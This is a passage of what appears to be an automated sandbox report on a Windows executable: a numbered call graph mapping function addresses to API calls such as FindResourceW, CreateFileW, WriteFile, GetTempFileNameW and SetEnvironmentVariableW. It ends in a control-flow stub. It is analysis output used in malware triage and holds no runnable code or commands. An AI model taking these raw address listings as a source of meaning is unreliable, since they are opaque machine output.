40a47a 14 API calls 8342->8349 8344->8372 8350 4038e9 8345->8350 8348->8372 8353 40391c 8349->8353 8355 40db00 3 API calls 8350->8355 8351 403940 8970 408f95 8351->8970 8352 40398e 8357 40a435 4 API calls 8352->8357 8358 40db00 3 API calls 8353->8358 8354 4039b9 8359 40db90 HeapFree 8354->8359 8355->8372 8361 403995 8357->8361 8358->8372 8363 4039d1 8359->8363 8362 40db00 3 API calls 8361->8362 8362->8288 8366 40db90 HeapFree 8363->8366 8364 40db00 3 API calls 8365 40395b 8364->8365 8368 403974 8365->8368 8369 403968 8365->8369 8367 4039d9 8366->8367 8367->7446 8371 401cf6 36 API calls 8368->8371 8993 40552c 8369->8993 8371->8372 8372->8288 8374 403fe8 8373->8374 8376 409507 SetEnvironmentVariableW 8373->8376 8377 40214f 8374->8377 8376->8374 8378 40dc00 21 API calls 8377->8378 8379 402159 8378->8379 9004 40dac0 GetLastError TlsGetValue SetLastError 8379->9004 8381 40215f 9005 40dac0 GetLastError TlsGetValue SetLastError 8381->9005 8383 402167 9006 40dac0 GetLastError TlsGetValue SetLastError 8383->9006 8385 40216f 9007 40dac0 GetLastError TlsGetValue SetLastError 8385->9007 8387 402177 8388 40cd40 7 API calls 8387->8388 8389 402189 8388->8389 9008 405182 TlsGetValue 8389->9008 8391 40218e 8392 405e30 5 API calls 8391->8392 8393 402196 8392->8393 8394 40db00 3 API calls 8393->8394 8395 4021a0 8394->8395 9009 40dac0 GetLastError TlsGetValue SetLastError 8395->9009 8397 4021a6 9010 40dac0 GetLastError TlsGetValue SetLastError 8397->9010 8399 4021ae 9011 40dac0 GetLastError TlsGetValue SetLastError 8399->9011 8401 4021b6 9012 40dac0 GetLastError TlsGetValue SetLastError 8401->9012 8403 4021be 8404 40cd40 7 API calls 8403->8404 8405 4021d0 8404->8405 9013 405182 TlsGetValue 8405->9013 8407 4021d5 8408 405e30 5 API calls 8407->8408 8409 4021dd 8408->8409 8410 40db00 3 API calls 8409->8410 8411 4021e7 8410->8411 9014 40dac0 GetLastError TlsGetValue SetLastError 8411->9014 8413 4021ed 9015 403255 8413->9015 8416 40db00 3 API calls 8417 402204 8416->8417 9049 40dac0 
GetLastError TlsGetValue SetLastError 8417->9049 8419 40220a 8420 403255 53 API calls 8419->8420 8421 402215 8420->8421 8422 40db00 3 API calls 8421->8422 8423 40221f 8422->8423 9050 4024b6 8423->9050 8426 40db90 HeapFree 8427 402239 8426->8427 8428 40db90 HeapFree 8427->8428 8429 402241 8428->8429 8430 40db90 HeapFree 8429->8430 8431 40224a 8430->8431 8432 40dac0 GetLastError TlsGetValue SetLastError 8431->8432 8432->7454 8434 40dc00 21 API calls 8433->8434 8435 401c2a 8434->8435 8436 4051a0 3 API calls 8435->8436 8437 401c33 8436->8437 8438 401c52 8437->8438 9180 40dac0 GetLastError TlsGetValue SetLastError 8437->9180 9178 40dac0 GetLastError TlsGetValue SetLastError 8438->9178 8441 401c5b 8443 40dc60 3 API calls 8441->8443 8442 401c41 9181 40259b 8442->9181 8446 401c63 8443->8446 9179 405170 TlsGetValue 8446->9179 8447 40db00 3 API calls 8447->8438 8449 401c6a 8450 40db90 HeapFree 8449->8450 8451 401c81 8450->8451 8451->7457 8452->7466 8453->7470 8454->7472 8456 4060e6 8455->8456 8458 4060b8 8455->8458 9265 40df40 TlsGetValue 8456->9265 9256 406020 8458->9256 8459 4060ef 8459->7474 8462->7478 8463->7480 8464->7488 8465->7490 8466->7492 8468 40dea0 2 API calls 8467->8468 8469 40a447 GetCurrentDirectoryW 8468->8469 8470 40a457 8469->8470 9268 40dff0 TlsGetValue 8470->9268 8472 4040b9 8473 40dcc0 TlsGetValue 8472->8473 8473->7496 8474->7498 8475->7504 8476->7506 8477->7508 8479 401d60 8478->8479 8479->8479 8480 40dc00 21 API calls 8479->8480 8481 401d72 8480->8481 8482 405060 2 API calls 8481->8482 8483 401d7e 8482->8483 8484 405060 2 API calls 8483->8484 8485 401d8b 8484->8485 8486 405060 2 API calls 8485->8486 8487 401d98 8486->8487 9269 40dac0 GetLastError TlsGetValue SetLastError 8487->9269 8489 401da4 8490 40dc60 3 API calls 8489->8490 8491 401dac 8490->8491 8492 40db00 3 API calls 8491->8492 8493 401db6 PathQuoteSpacesW 8492->8493 9270 40dac0 GetLastError TlsGetValue SetLastError 8493->9270 8495 401dc9 8496 40dc60 3 API calls 8495->8496 8497 401dd1 8496->8497 
8535 4054b1 RtlEnterCriticalSection 8534->8535 8536 404024 8534->8536 8537 4054f7 8535->8537 8540 4054c7 8535->8540 8536->7464 8538 40d7b2 RtlAllocateHeap 8537->8538 8542 405511 RtlLeaveCriticalSection 8538->8542 8539 4054c8 WaitForSingleObject 8539->8540 8541 4054d8 CloseHandle 8539->8541 8540->8537 8540->8539 8543 40d772 HeapFree 8541->8543 8542->8536 8543->8540 8545 40dc00 21 API calls 8544->8545 8546 402fcb 8545->8546 8547 405060 2 API calls 8546->8547 8548 402fd7 8547->8548 8549 403004 8548->8549 9333 40dac0 GetLastError TlsGetValue SetLastError 8548->9333 9335 40dac0 GetLastError TlsGetValue SetLastError 8549->9335 8552 402fe6 9334 40dac0 GetLastError TlsGetValue SetLastError 8552->9334 8553 40300a 9336 40dac0 GetLastError TlsGetValue SetLastError 8553->9336 8556 403012 9337 40dac0 GetLastError TlsGetValue SetLastError 8556->9337 8557 402fee 8559 409800 3 API calls 8557->8559 8561 402ffa 8559->8561 8560 40301a 9338 40dac0 GetLastError TlsGetValue SetLastError 8560->9338 8563 40db00 3 API calls 8561->8563 8563->8549 8564 403022 8565 40cd40 7 API calls 8564->8565 8566 403032 8565->8566 9339 405182 TlsGetValue 8566->9339 8568 403037 8569 405e30 5 API calls 8568->8569 8570 40303f 8569->8570 8571 40db00 3 API calls 8570->8571 8572 403049 FindResourceW 8571->8572 8573 40306c 8572->8573 8577 403118 8572->8577 8574 402762 26 API calls 8573->8574 8575 40307b 8574->8575 8576 404244 RtlSizeHeap 8575->8576 8579 403088 8576->8579 8578 403140 8577->8578 8580 403130 8577->8580 8581 403147 8577->8581 8584 40db90 HeapFree 8578->8584 8583 4011de 11 API calls 8579->8583 8585 40548c 7 API calls 8580->8585 9349 4027c5 8581->9349 8586 4030a2 8583->8586 8587 40315b 8584->8587 8585->8578 9340 40dac0 GetLastError TlsGetValue SetLastError 8586->9340 8589 40db90 HeapFree 8587->8589 8591 403164 8589->8591 8590 4030a8 9341 40dac0 GetLastError TlsGetValue SetLastError 8590->9341 8591->7464 8593 4030b0 8594 409850 4 API calls 8593->8594 8595 4030c1 8594->8595 8596 40db00 3 API calls 
8595->8596 8597 4030cd 8596->8597 9342 4097c0 HeapFree 8597->9342 8599 4030d6 9343 405920 8599->9343 8603 4030f1 9348 40dac0 GetLastError TlsGetValue SetLastError 8603->9348 8605 4030f9 8606 405ea0 4 API calls 8605->8606 8607 40310c 8606->8607 8608 40db00 3 API calls 8607->8608 8608->8577 8659 40dd20 8609->8659 8611 40342d 8611->7934 8613 402edb 8612->8613 8613->8613 8614 40dc00 21 API calls 8613->8614 8615 402eed GetNativeSystemInfo 8614->8615 8616 402f00 8615->8616 8616->7938 8616->7939 8617->7964 8618->7972 8620 4055c2 8619->8620 8624 403448 8619->8624 8620->8624 8662 40554d memset GetModuleHandleW 8620->8662 8623 405600 GetVersionExW 8623->8624 8624->7939 8625->7946 8626->7950 8628 40dea0 2 API calls 8627->8628 8629 40347a 8628->8629 8629->7957 8630->7963 8631->7977 8632->7994 8665 40d0d8 RtlEnterCriticalSection 8633->8665 8635 40aa15 8636 40aaae 8635->8636 8637 40aa1f CreateFileW 8635->8637 8636->8004 8638 40aa40 8637->8638 8639 40aa60 8637->8639 8638->8639 8641 40aa4d RtlAllocateHeap 8638->8641 8642 40aaa5 8639->8642 8674 40d04a RtlEnterCriticalSection 8639->8674 8641->8639 8642->8004 8644 40a629 8643->8644 8645 40a61a 8643->8645 8685 40d099 RtlEnterCriticalSection 8644->8685 8689 40d635 8645->8689 8650 40a66d 8650->8005 8651 40a659 FindCloseChangeNotification 8653 40d04a 4 API calls 8651->8653 8652 40a680 WriteFile 8654 40a648 HeapFree 8652->8654 8653->8650 8654->8651 8655->8012 8656->8014 8657->7947 8658->7951 8660 40dd67 8659->8660 8661 40dd2a wcslen RtlAllocateHeap 8659->8661 8660->8611 8661->8660 8663 405575 GetProcAddress 8662->8663 8664 405585 8662->8664 8663->8664 8664->8623 8664->8624 8666 40d0f2 8665->8666 8667 40d107 8665->8667 8668 40d7b2 RtlAllocateHeap 8666->8668 8669 40d12c 8667->8669 8670 40d10c RtlReAllocateHeap 8667->8670 8672 40d101 RtlLeaveCriticalSection 8668->8672 8671 40d141 RtlAllocateHeap 8669->8671 8669->8672 8670->8669 8671->8672 8672->8635 8675 40d081 8674->8675 8676 40d062 8674->8676 8682 40d772 8675->8682 8676->8675 8677 40d067 
8676->8677 8679 40d070 memset 8677->8679 8680 40d08d RtlLeaveCriticalSection 8677->8680 8679->8680 8680->8642 8681 40d08b 8681->8680 8683 40d783 HeapFree 8682->8683 8683->8681 8686 40d0b2 8685->8686 8687 40d0bd RtlLeaveCriticalSection 8685->8687 8686->8687 8688 40a636 8687->8688 8688->8650 8688->8651 8688->8652 8690 40d642 8689->8690 8691 40a625 8689->8691 8695 40d75b RtlEnterCriticalSection 8690->8695 8691->8005 8694 40d648 8694->8691 8696 40d704 8694->8696 8695->8694 8698 40d710 8696->8698 8697 40d754 8697->8694 8698->8697 8699 40d74a RtlLeaveCriticalSection 8698->8699 8699->8697 8701 4097e8 RtlAllocateHeap 8700->8701 8702 4097fa 8700->8702 8701->8038 8702->8038 8704 40e407 8703->8704 8706 40e41b 8704->8706 8718 40e4a0 8704->8718 8706->8042 8708 40dc00 21 API calls 8707->8708 8709 40276b LoadResource SizeofResource 8708->8709 8710 4097e0 RtlAllocateHeap 8709->8710 8711 402798 8710->8711 8733 4098c0 memcpy 8711->8733 8713 4027af FreeResource 8714 4027bf 8713->8714 8715 404244 8714->8715 8734 4097a0 8715->8734 8717 40424d 8717->8035 8719 40ee55 8718->8719 8720 40e4b0 8718->8720 8719->8706 8720->8719 8721 40ea01 8720->8721 8724 40e928 memcpy 8720->8724 8723 40ea69 8721->8723 8725 40fe80 8721->8725 8723->8706 8724->8720 8726 40fe94 8725->8726 8727 40ff02 memcpy 8726->8727 8728 40fedc memcpy 8726->8728 8729 40feaf 8726->8729 8731 40ff48 8727->8731 8732 40ff29 memcpy 8727->8732 8728->8723 8729->8723 8731->8723 8732->8723 8733->8713 8735 4097a8 RtlSizeHeap 8734->8735 8736 4097ba 8734->8736 8735->8717 8736->8717 8737->8056 8738->8063 8739->8055 8740->8059 8741->8064 8742->8067 8744 409869 8743->8744 8745 409859 8743->8745 8747 40dea0 2 API calls 8744->8747 8845 409800 8745->8845 8749 40987f 8747->8749 8851 40dff0 TlsGetValue 8749->8851 8751 4098a8 8751->8071 8752->8074 8852 405f30 8753->8852 8755 4022bb 8755->8080 8756->8084 8757->8086 8758->8088 8759->8090 8760->8094 8761->8100 8762->8102 8763->8104 8764->8106 8766 40590f 8765->8766 8773 405801 8765->8773 8862 40df40 
TlsGetValue 8766->8862 8768 405918 8768->8108 8769 405886 8771 40de20 TlsGetValue 8769->8771 8770 405850 _wcsncoll 8770->8773 8772 4058c7 8771->8772 8774 4058e9 8772->8774 8861 40de70 TlsGetValue 8772->8861 8773->8769 8773->8770 8776 40dea0 2 API calls 8774->8776 8778 4058f0 8776->8778 8777 4058d7 memmove 8777->8774 8779 405901 8778->8779 8780 4058f6 wcsncpy 8778->8780 8779->8108 8780->8779 8781->8110 8782->8112 8783->8114 8784->8118 8785->8120 8863 408a98 8786->8863 8788 408bc1 8789 408a98 3 API calls 8788->8789 8790 408bd0 8789->8790 8791 408a98 3 API calls 8790->8791 8792 408be3 8791->8792 8793 408bf0 GetStockObject 8792->8793 8794 408bfd LoadIconW LoadCursorW RegisterClassExW 8792->8794 8793->8794 8867 409111 GetForegroundWindow 8794->8867 8799 408c87 IsWindowEnabled 8800 408cab 8799->8800 8801 408c92 EnableWindow 8799->8801 8802 409111 3 API calls 8800->8802 8801->8800 8803 408cbe GetSystemMetrics GetSystemMetrics CreateWindowExW 8802->8803 8804 408d0b SetWindowLongW CreateWindowExW SendMessageW 8803->8804 8805 408efa 8803->8805 8807 408d65 8804->8807 8808 408d68 CreateWindowExW SendMessageW SetFocus 8804->8808 8806 408f0d 8805->8806 8881 40df40 TlsGetValue 8805->8881 8882 408ada 8806->8882 8807->8808 8811 408de5 CreateWindowExW SendMessageW CreateAcceleratorTableW SetForegroundWindow BringWindowToTop 8808->8811 8812 408dbb SendMessageW wcslen wcslen SendMessageW 8808->8812 8814 408eaa 8811->8814 8812->8811 8816 408eb3 8814->8816 8817 408e6e GetMessageW 8814->8817 8815 408ada HeapFree 8818 408f1f 8815->8818 8820 408eb7 DestroyAcceleratorTable 8816->8820 8821 408ebe 8816->8821 8817->8816 8819 408e83 TranslateAcceleratorW 8817->8819 8822 408ada HeapFree 8818->8822 8819->8814 8823 408e94 TranslateMessage DispatchMessageW 8819->8823 8820->8821 8821->8805 8824 408ec5 wcslen 8821->8824 8826 40238f 8822->8826 8823->8814 8825 40dea0 2 API calls 8824->8825 8827 408edc wcscpy HeapFree 8825->8827 8826->8123 8827->8805 8828->8129 8829->8131 8830->8133 8831->8135 
8832->8139 8833->8146 8834->8148 8835->8150 8836->8154 8837->8156 8839 409111 3 API calls 8838->8839 8840 408a6d 8839->8840 8841 4091c8 16 API calls 8840->8841 8842 408a76 MessageBoxW 8841->8842 8843 4091c8 16 API calls 8842->8843 8844 402449 8843->8844 8844->8159 8846 40980d 8845->8846 8847 40dea0 2 API calls 8846->8847 8848 40982b 8847->8848 8849 409831 memcpy 8848->8849 8850 40983f 8848->8850 8849->8850 8850->8071 8851->8751 8855 405f41 8852->8855 8853 40de20 TlsGetValue 8854 405fb4 8853->8854 8856 40dea0 2 API calls 8854->8856 8855->8853 8855->8855 8857 405fc2 8856->8857 8859 405fd2 8857->8859 8860 40df70 TlsGetValue 8857->8860 8859->8755 8860->8859 8861->8777 8862->8768 8864 408aa0 wcslen RtlAllocateHeap 8863->8864 8865 408ad6 8863->8865 8864->8865 8866 408ac6 wcscpy 8864->8866 8865->8788 8866->8788 8868 408c72 8867->8868 8869 409122 GetWindowThreadProcessId GetCurrentProcessId 8867->8869 8870 4091c8 8868->8870 8869->8868 8871 4091d2 EnumWindows 8870->8871 8876 40921d 8870->8876 8874 4091ef 8871->8874 8877 408c7e 8871->8877 8885 409147 GetWindowThreadProcessId GetCurrentThreadId 8871->8885 8872 40922a GetCurrentThreadId 8872->8876 8873 4091f1 GetCurrentThreadId 8873->8874 8874->8873 8874->8877 8878 409204 SetWindowPos 8874->8878 8875 409240 EnableWindow 8875->8876 8876->8872 8876->8875 8876->8877 8879 409251 SetWindowPos 8876->8879 8880 40d772 HeapFree 8876->8880 8877->8799 8877->8800 8878->8874 8879->8876 8880->8876 8881->8806 8883 408ae1 HeapFree 8882->8883 8884 408af3 8882->8884 8883->8884 8884->8815 8886 409165 IsWindowVisible 8885->8886 8887 4091bf 8885->8887 8886->8887 8888 409170 8886->8888 8889 40d7b2 RtlAllocateHeap 8888->8889 8890 40917c GetCurrentThreadId GetWindowLongW 8889->8890 8891 40919a 8890->8891 8892 40919e GetForegroundWindow 8890->8892 8891->8892 8892->8887 8893 4091a8 IsWindowEnabled 8892->8893 8893->8887 8894 4091b3 EnableWindow 8893->8894 8894->8887 8895->8169 8896->8172 8898 40dea0 2 API calls 8897->8898 8899 40a3e5 GetTempPathW 
LoadLibraryW 8898->8899 8900 40a420 8899->8900 8901 40a402 GetProcAddress 8899->8901 8921 40dff0 TlsGetValue 8900->8921 8902 40a412 GetLongPathNameW 8901->8902 8903 40a419 FreeLibrary 8901->8903 8902->8903 8903->8900 8905 401fa6 8905->8175 8906->8178 8907->8181 8922 40a396 8908->8922 8911 40a305 8912 40a314 wcsncpy wcslen 8911->8912 8913 402003 GetTempFileNameW 8911->8913 8915 40a348 CreateDirectoryW 8912->8915 8916 40dac0 GetLastError TlsGetValue SetLastError 8913->8916 8915->8913 8916->8193 8917->8195 8918->8205 8919->8207 8920->8215 8921->8905 8923 40a39d 8922->8923 8924 401ff8 8922->8924 8925 40a3b3 DeleteFileW 8923->8925 8926 40a3a4 SetFileAttributesW 8923->8926 8924->8911 8925->8924 8926->8925 8927->8228 8929 40a5a1 SetCurrentDirectoryW 8928->8929 8930 404220 8928->8930 8929->8930 8930->8236 8931->8315 8932->8354 8933->8260 8934->8269 8935->8261 8936->8268 8937->8284 8939 40dea0 2 API calls 8938->8939 8940 40a48f 8939->8940 8941 40a49e LoadLibraryW 8940->8941 8946 40a529 8940->8946 8942 40a50b 8941->8942 8943 40a4af GetProcAddress 8941->8943 8998 40a5ac SHGetFolderLocation 8942->8998 8947 40a500 FreeLibrary 8943->8947 8948 40a4c4 8943->8948 8949 40a5ac 3 API calls 8946->8949 8952 40a55b 8946->8952 8947->8942 8947->8952 8948->8947 8953 40a4d6 wcscpy wcscat wcslen 8948->8953 8949->8952 8950 4037b7 8950->8313 9002 40dff0 TlsGetValue 8952->9002 8953->8947 8954->8273 8955->8289 8956->8286 8957->8296 8958->8290 8959->8309 8960->8297 8961->8316 8962->8310 8963->8332 8964->8317 8965->8336 8966->8324 8967->8342 8968->8337 8969->8351 8971 408fa8 CoInitialize 8970->8971 8972 408fb9 memset LoadLibraryW 8970->8972 8971->8972 8973 408fe3 GetProcAddress GetProcAddress 8972->8973 8974 4090eb 8972->8974 8975 409012 wcsncpy wcslen 8973->8975 8976 40900d 8973->8976 8977 40dea0 2 API calls 8974->8977 8979 409041 8975->8979 8976->8975 8978 4090f8 8977->8978 9003 40dff0 TlsGetValue 8978->9003 8980 409111 3 API calls 8979->8980 8982 40905f 8980->8982 8984 4091c8 16 API calls 
8982->8984 8983 403951 8983->8364 8985 409082 8984->8985 8986 4091c8 16 API calls 8985->8986 8987 409097 8986->8987 8988 4090df FreeLibrary 8987->8988 8989 40dea0 2 API calls 8987->8989 8988->8974 8988->8978 8990 4090a8 wcslen 8989->8990 8990->8988 8992 4090d3 8990->8992 8992->8988 8994 405535 timeBeginPeriod 8993->8994 8995 405547 Sleep 8993->8995 8994->8995 8996->8338 8997->8352 8999 40a5cb SHGetPathFromIDListW 8998->8999 9000 40a513 wcscat wcslen 8998->9000 8999->9000 9001 40a5d9 wcslen 8999->9001 9000->8952 9001->9000 9002->8950 9003->8983 9004->8381 9005->8383 9006->8385 9007->8387 9008->8391 9009->8397 9010->8399 9011->8401 9012->8403 9013->8407 9014->8413 9016 40dc00 21 API calls 9015->9016 9017 403260 9016->9017 9018 4051a0 3 API calls 9017->9018 9019 403269 9018->9019 9020 405060 2 API calls 9019->9020 9021 403275 FindResourceW 9020->9021 9022 403301 9021->9022 9023 403294 9021->9023 9065 40dac0 GetLastError TlsGetValue SetLastError 9022->9065 9025 402762 26 API calls 9023->9025 9027 4032a3 9025->9027 9026 40330b 9028 40dc60 3 API calls 9026->9028 9029 404244 RtlSizeHeap 9027->9029 9030 403313 9028->9030 9031 4032b0 9029->9031 9066 405170 TlsGetValue 9030->9066 9067 4011de 9031->9067 9034 40331a 9037 40db90 HeapFree 9034->9037 9039 403331 9037->9039 9038 4032d0 9092 40dac0 GetLastError TlsGetValue SetLastError 9038->9092 9041 40db90 HeapFree 9039->9041 9043 4021f8 9041->9043 9042 4032d8 9093 4098f0 9042->9093 9043->8416 9045 4032ee 9046 40db00 3 API calls 9045->9046 9047 4032f8 9046->9047 9103 4097c0 HeapFree 9047->9103 9049->8419 9051 405060 2 API calls 9050->9051 9052 4024c9 9051->9052 9053 405060 2 API calls 9052->9053 9054 4024d6 9053->9054 9113 40a8f0 9054->9113 9057 40250e 9061 40db90 HeapFree 9057->9061 9059 402501 9060 40a610 11 API calls 9059->9060 9060->9057 9062 402535 9061->9062 9063 40db90 HeapFree 9062->9063 9064 40222e 9063->9064 9064->8426 9065->9026 9066->9034 9068 4011e6 9067->9068 9068->9068 9069 405060 2 API calls 9068->9069 9070 4011ff 
9069->9070 9104 405700 9070->9104 9073 4097a0 RtlSizeHeap 9074 401214 9073->9074 9075 40d80a 4 API calls 9074->9075 9076 401236 9075->9076 9077 40d80a 4 API calls 9076->9077 9078 401254 9077->9078 9079 40d80a 4 API calls 9078->9079 9080 4014ac 9079->9080 9081 40d80a 4 API calls 9080->9081 9082 4014ca 9081->9082 9111 4097c0 HeapFree 9082->9111 9084 4014d3 9085 40db90 HeapFree 9084->9085 9086 4014e3 9085->9086 9087 40d95d 2 API calls 9086->9087 9088 4014ed 9087->9088 9089 40d95d 2 API calls 9088->9089 9090 4014f6 9089->9090 9091 40dac0 GetLastError TlsGetValue SetLastError 9090->9091 9091->9038 9092->9042 9094 409910 9093->9094 9098 409968 9093->9098 9095 40dea0 2 API calls 9094->9095 9096 409939 9095->9096 9112 40dff0 TlsGetValue 9096->9112 9097 4099c3 MultiByteToWideChar 9100 40dea0 2 API calls 9097->9100 9098->9097 9102 4099e0 MultiByteToWideChar 9100->9102 9101 40995d 9101->9045 9102->9045 9103->9022 9105 405710 WideCharToMultiByte 9104->9105 9106 40570b 9104->9106 9107 4097e0 RtlAllocateHeap 9105->9107 9106->9105 9108 405730 9107->9108 9109 405736 WideCharToMultiByte 9108->9109 9110 401207 9108->9110 9109->9110 9110->9073 9111->9084 9112->9101 9122 40a700 9113->9122 9115 4024e9 9115->9057 9116 40abc0 9115->9116 9117 40d099 2 API calls 9116->9117 9118 40abcf 9117->9118 9119 40abe3 9118->9119 9144 40aac0 9118->9144 9119->9059 9121 40abe0 9121->9059 9123 40a718 9122->9123 9124 40d0d8 5 API calls 9123->9124 9125 40a72f 9124->9125 9126 40a8e2 9125->9126 9127 40a742 9125->9127 9128 40a77e 9125->9128 9126->9115 9130 40a759 9127->9130 9131 40a75c CreateFileW 9127->9131 9129 40a783 9128->9129 9134 40a7bc 9128->9134 9132 40a79a 9129->9132 9133 40a79d CreateFileW 9129->9133 9130->9131 9136 40a828 9131->9136 9132->9133 9133->9136 9135 40a7e7 CreateFileW 9134->9135 9134->9136 9135->9136 9137 40a809 CreateFileW 9135->9137 9138 40a862 9136->9138 9139 40a84e RtlAllocateHeap 9136->9139 9141 40a8b0 9136->9141 9137->9136 9138->9141 9142 40a89c SetFilePointer 9138->9142 9139->9138 
9140 40d04a 4 API calls 9140->9126 9141->9140 9143 40a8c1 9141->9143 9142->9141 9143->9115 9145 40abb4 9144->9145 9146 40aad4 9144->9146 9145->9121 9146->9145 9147 40aae8 9146->9147 9148 40ab4d 9146->9148 9149 40ab20 9147->9149 9150 40aaf8 9147->9150 9173 40ad70 WideCharToMultiByte 9148->9173 9149->9149 9153 40ab2b WriteFile 9149->9153 9162 40ac60 9150->9162 9152 40ab67 9154 40abab 9152->9154 9155 40ab77 9152->9155 9156 40ab88 WriteFile 9152->9156 9153->9121 9154->9121 9158 40ac60 4 API calls 9155->9158 9159 40ab9c HeapFree 9156->9159 9161 40ab82 9158->9161 9159->9154 9160 40ab1a 9160->9121 9161->9159 9163 40ad67 9162->9163 9164 40ac7a 9162->9164 9163->9160 9165 40ac80 SetFilePointer 9164->9165 9166 40acab 9164->9166 9165->9166 9167 40a680 WriteFile 9166->9167 9170 40acb7 9166->9170 9169 40ad2e 9167->9169 9168 40ace7 9168->9160 9169->9170 9171 40ad35 WriteFile 9169->9171 9170->9168 9172 40acd1 memcpy 9170->9172 9171->9160 9172->9160 9174 40ad95 RtlAllocateHeap 9173->9174 9175 40adce 9173->9175 9176 40adc9 9174->9176 9177 40adac WideCharToMultiByte 9174->9177 9175->9152 9176->9152 9177->9176 9178->8441 9179->8449 9180->8442 9182 4025a1 9181->9182 9182->9182 9183 40dc00 21 API calls 9182->9183 9184 4025b3 9183->9184 9185 4051a0 3 API calls 9184->9185 9198 4025bc 9185->9198 9186 40263d 9245 40dac0 GetLastError TlsGetValue SetLastError 9186->9245 9188 402643 9246 40dac0 GetLastError TlsGetValue SetLastError 9188->9246 9190 40264b GetCommandLineW 9192 409800 3 API calls 9190->9192 9191 405f10 2 API calls 9191->9198 9193 402658 9192->9193 9194 40db00 3 API calls 9193->9194 9195 402662 9194->9195 9247 40dac0 GetLastError TlsGetValue SetLastError 9195->9247 9196 40dac0 GetLastError TlsGetValue SetLastError 9196->9198 9198->9186 9198->9191 9198->9196 9200 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9198->9200 9205 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9198->9205 9199 40266c 9201 40dc60 3 API calls 9199->9201 9200->9198 9202 402674 9201->9202 9203 40db00 3 API 
calls 9202->9203 9204 40267e PathRemoveArgsW 9203->9204 9206 402695 9204->9206 9205->9198 9207 4026fb 9206->9207 9248 40dac0 GetLastError TlsGetValue SetLastError 9206->9248 9209 409500 SetEnvironmentVariableW 9207->9209 9210 402708 9209->9210 9254 40dac0 GetLastError TlsGetValue SetLastError 9210->9254 9211 4026a7 9213 40dc60 3 API calls 9211->9213 9215 4026b4 9213->9215 9214 402712 9216 40dc60 3 API calls 9214->9216 9249 40dac0 GetLastError TlsGetValue SetLastError 9215->9249 9219 40271a 9216->9219 9218 4026ba 9250 40dac0 GetLastError TlsGetValue SetLastError 9218->9250 9255 405170 TlsGetValue 9219->9255 9222 4026c2 9251 40dac0 GetLastError TlsGetValue SetLastError 9222->9251 9223 402721 9226 40db90 HeapFree 9223->9226 9225 4026ca 9252 40dac0 GetLastError TlsGetValue SetLastError 9225->9252 9228 402739 9226->9228 9230 40db90 HeapFree 9228->9230 9229 4026d2 9231 4060b0 6 API calls 9229->9231 9232 402742 9230->9232 9233 4026e3 9231->9233 9234 40db90 HeapFree 9232->9234 9253 405182 TlsGetValue 9233->9253 9236 40274b 9234->9236 9238 40db90 HeapFree 9236->9238 9237 4026e8 9239 406000 4 API calls 9237->9239 9240 402754 9238->9240 9242 4026f0 9239->9242 9241 40db90 HeapFree 9240->9241 9243 401c48 9241->9243 9244 40db00 3 API calls 9242->9244 9243->8447 9244->9207 9245->9188 9246->9190 9247->9199 9248->9211 9249->9218 9250->9222 9251->9225 9252->9229 9253->9237 9254->9214 9255->9223 9257 40de20 TlsGetValue 9256->9257 9258 40603c 9257->9258 9259 40dea0 2 API calls 9258->9259 9260 406048 9259->9260 9262 406054 9260->9262 9266 40df70 TlsGetValue 9260->9266 9267 40dff0 TlsGetValue 9262->9267 9264 40609d 9264->7474 9265->8459 9266->9262 9267->9264 9268->8472 9269->8489 9270->8495 9333->8552 9334->8557 9335->8553 9336->8556 9337->8560 9338->8564 9339->8568 9340->8590 9341->8593 9342->8599 9344 405930 9343->9344 9346 4030e7 9343->9346 9345 405959 wcsstr 9344->9345 9344->9346 9345->9346 9347 40dac0 GetLastError TlsGetValue SetLastError 9346->9347 9347->8603 9348->8605 9350 
4027cc 9349->9350 9350->9350 9351 40dc00 21 API calls 9350->9351 9352 4027de 9351->9352 9353 405060 2 API calls 9352->9353 9354 4027ea 9353->9354 9410 401500 9354->9410 9356 402be6 9508 4097c0 HeapFree 9356->9508 9358 402bef 9509 40dac0 GetLastError TlsGetValue SetLastError 9358->9509 9360 402bf5 9510 40dac0 GetLastError TlsGetValue SetLastError 9360->9510 9362 402bfd 9511 40dac0 GetLastError TlsGetValue SetLastError 9362->9511 9364 402c05 9365 406100 3 API calls 9364->9365 9367 402c14 9365->9367 9366 40cd40 7 API calls 9408 4027ef 9366->9408 9512 40dcc0 TlsGetValue 9367->9512 9369 402c19 9513 405182 TlsGetValue 9369->9513 9370 405e30 5 API calls 9370->9408 9372 402c24 9373 409500 SetEnvironmentVariableW 9372->9373 9374 402c2d 9373->9374 9375 4051a0 3 API calls 9374->9375 9376 402c32 9375->9376 9377 401500 102 API calls 9376->9377 9378 402c37 9377->9378 9380 40db90 HeapFree 9378->9380 9379 405d90 4 API calls 9379->9408 9381 402c49 9380->9381 9383 40db90 HeapFree 9381->9383 9382 40db00 3 API calls 9384 402881 FindResourceW FindResourceW 9382->9384 9385 402c52 9383->9385 9384->9408 9386 40db90 HeapFree 9385->9386 9387 402762 26 API calls 9387->9408 9389 404244 RtlSizeHeap 9389->9408 9391 40dc60 wcslen TlsGetValue RtlReAllocateHeap 9391->9408 9393 4097e0 RtlAllocateHeap 9393->9408 9394 40a385 SetFileAttributesW 9394->9408 9396 4011de 11 API calls 9396->9408 9397 40dac0 GetLastError TlsGetValue SetLastError 9397->9408 9400 40e3c0 4 API calls 9400->9408 9401 404254 53 API calls 9401->9408 9404 405182 TlsGetValue 9404->9408 9405 409500 SetEnvironmentVariableW 9405->9408 9406 4051a0 3 API calls 9406->9408 9408->9356 9408->9366 9408->9370 9408->9379 9408->9382 9408->9387 9408->9389 9408->9391 9408->9393 9408->9394 9408->9396 9408->9397 9408->9400 9408->9401 9408->9404 9408->9405 9408->9406 9409 40db00 TlsGetValue RtlAllocateHeap RtlReAllocateHeap 9408->9409 9453 4097c0 HeapFree 9408->9453 9454 402545 9408->9454 9463 402f0e 9408->9463 9492 40dcc0 TlsGetValue 9408->9492 9493 

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 0040DEA0: TlsGetValue.KERNEL32(0000000E), ref: 0040DEAC
                                                        • Part of subcall function 0040DEA0: RtlReAllocateHeap.NTDLL(03410000,00000000,00000000,?), ref: 0040DF07
                                                      • GetTempPathW.KERNEL32(00000104,00000000,00000104,00000000,?,?,?,00000000,00401FA6,00000000,00000000,00000400,00000000,00000000,00000000,00000000), ref: 0040A3E9
